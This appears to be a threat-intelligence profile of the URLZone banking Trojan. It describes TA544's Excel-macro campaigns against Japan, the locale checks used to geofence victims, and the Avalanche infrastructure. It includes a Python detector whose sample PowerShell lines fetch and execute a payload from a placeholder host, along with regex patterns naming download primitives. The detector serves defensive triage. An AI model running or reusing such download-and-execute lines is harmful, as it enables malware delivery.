URLzone
URLZone, also known as Bebloh and Shiotob, is a banking Trojan first observed in 2009. Public reporting describes it as an eBanking Trojan and ties it to the credential and financial-data theft typical of banking malware. It has been observed both as a hosted malware family and as a botnet using the Avalanche fast-flux communication infrastructure, and Avalanche-related investigations linked Bebloh/URLZone infections to German-speaking victims and to shared command-and-control infrastructure.
In the reported campaigns, URLZone was commonly delivered through malicious Microsoft Excel documents containing macros. When victims enabled macros, the documents downloaded URLZone as an initial payload; URLZone then downloaded and installed Ursnif, including Ursnif 1000 in Japan-focused activity. Delivery chains used multiple layers of obfuscation, geofencing, and locale checks to verify intended victims, especially in Japan. Reported checks include Japanese Excel country settings, Japanese-language PowerShell error text, Japanese year formatting, and LCID 1041. Some campaigns also used steganography, embedding malicious code in image data referenced by Office documents.
Reported URLZone activity is strongly associated with the financially motivated actor TA544. Proofpoint assessed TA544 as a high-volume distributor operating primarily in Japan and Italy, using localized invoice- or payment-themed phishing emails and malicious Office attachments. In 2019, URLZone was reported as the highest-volume email threat in Japan, where it appeared mainly as an initial payload leading to Ursnif infections configured with web injects for Japanese banks. TA544 also used geofencing and localized lures to target victims in Japan and Italy.
The malware is also repeatedly listed among families distributed or hosted via the Avalanche criminal infrastructure, alongside other banking trojans, ransomware, and botnets. Avalanche was used for phishing, malware distribution, and botnet communications, and supported URLZone/Bebloh among many other malware families. No standalone file hashes, domains, or IP indicators specific to URLZone are provided in the reporting summarized here.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Messages from these campaigns drop their payloads via Microsoft Excel documents with macros that, when enabled, download URLZone (another banking Trojan), which, in turn, downloads Ursnif 1000.
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (3 techniques)
The criminal groups have been using the Avalanche infrastructure since 2009 for conducting malware, phishing and spam activities. They sent more than 1 million e-mails with damaging attachments or links every week to unsuspecting victims.
Execution (4 techniques)
It may be delivered via password-protected Zip files; Microsoft Office document attachments with malicious macros; or compressed JScript, JavaScript, or Visual Basic scripts.
Examples of recent language and locale checks include: PowerShell error for a non-existent command contains "用語" ...; PowerShell cmdlet 'Get-date' ...; PowerShell cmdlet 'Get-Culture."LCID"' needs to contain "04".
Stealth (3 techniques)
The macros also use multiple layers of obfuscation and various locale and language checks to ensure the victim machine is in Japan before downloading and decoding the initial payload.
Credential Access (2 techniques)
Discovery (3 techniques)
Most Ursnif 1000 campaigns use a robust combination of geofencing techniques to verify that users are located in Japan.
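The locale and language checks quoted in the Execution, Stealth and Discovery entries above (Japanese CommandNotFound error text, Get-Date year formatting, a Get-Culture LCID containing "04") can be turned into a triage heuristic over PowerShell script block logs. The following is an added example, not code from the page's sources or from Mallory; the indicator patterns, weights, threshold and sample script blocks are constructed assumptions.

```python
import re

# Heuristic indicators derived from the locale checks described in public
# reporting on URLZone/Ursnif 1000 delivery macros. Patterns and weights are
# constructed for illustration, not a vendor detection rule.
INDICATORS = [
    # Get-Culture followed closely by an LCID access
    ("lcid_check", re.compile(r"Get-Culture.{0,40}LCID", re.IGNORECASE), 2),
    # Japanese LCID 1041, or the quoted "04" substring the reporting mentions
    ("lcid_japan", re.compile(r"\b1041\b|['\"]04['\"]"), 1),
    # Japanese "用語" appears in the localized CommandNotFound error message
    ("jp_error_text", re.compile("用語"), 3),
    # Get-Date used to inspect year formatting (Japanese era/year strings)
    ("getdate_year", re.compile(r"Get-Date.{0,60}(yyyy|Year|年)", re.IGNORECASE), 1),
    # A download/execute primitive in the same block as a locale probe
    ("download_primitive", re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression)\b",
        re.IGNORECASE), 2),
]


def score_script_block(text):
    """Return (score, [matched indicator names]) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def triage(script_blocks, threshold=4):
    """Flag blocks whose combined locale-check and download indicators reach the threshold."""
    flagged = []
    for idx, block in enumerate(script_blocks):
        score, hits = score_script_block(block)
        if score >= threshold:
            flagged.append((idx, score, hits))
    return flagged


# Constructed sample script block texts, shaped like the ScriptBlockText field
# of PowerShell script block logging (Event ID 4104). Not real samples.
SAMPLES = [
    # benign: an admin script reporting the current culture
    "Get-Culture | Select-Object Name, DisplayName",
    # suspicious: LCID checked for the "04" substring, then a remote payload executed
    "if ((Get-Culture).LCID -match '04') { IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p') }",
    # suspicious: probes the localized CommandNotFound message before fetching
    "try { nonexistent-cmd } catch { if ($_.Exception.Message -match '用語') { Invoke-WebRequest http://example.invalid/a } }",
]

if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLES):
        print(f"block {idx}: score={score} indicators={hits}")
```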
Collection (1 technique)
Command and Control (4 techniques)
Sinkholing is an action whereby traffic between infected computers and a criminal infrastructure is redirected to servers controlled by law enforcement authorities... infected computers can no longer reach the criminal command and control computer systems and so criminals can no longer control the infected computers.
Avalanche used fast-flux DNS, a technique to hide the criminal servers behind a constantly changing network of compromised systems acting as proxies.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
Banking trojan used by TA544 especially in Japan, commonly as an intermediate payload that downloads Ursnif 1000.
Banking trojan used heavily in Japan-targeted email campaigns. Delivered via malicious Excel macros, it performs locale/language checks to verify Japanese targets and then downloads Ursnif as a follow-on payload.
Payload dropped from malicious Excel documents as part of an infection chain that ultimately delivers Ursnif.
Banking trojan associated with Avalanche infrastructure.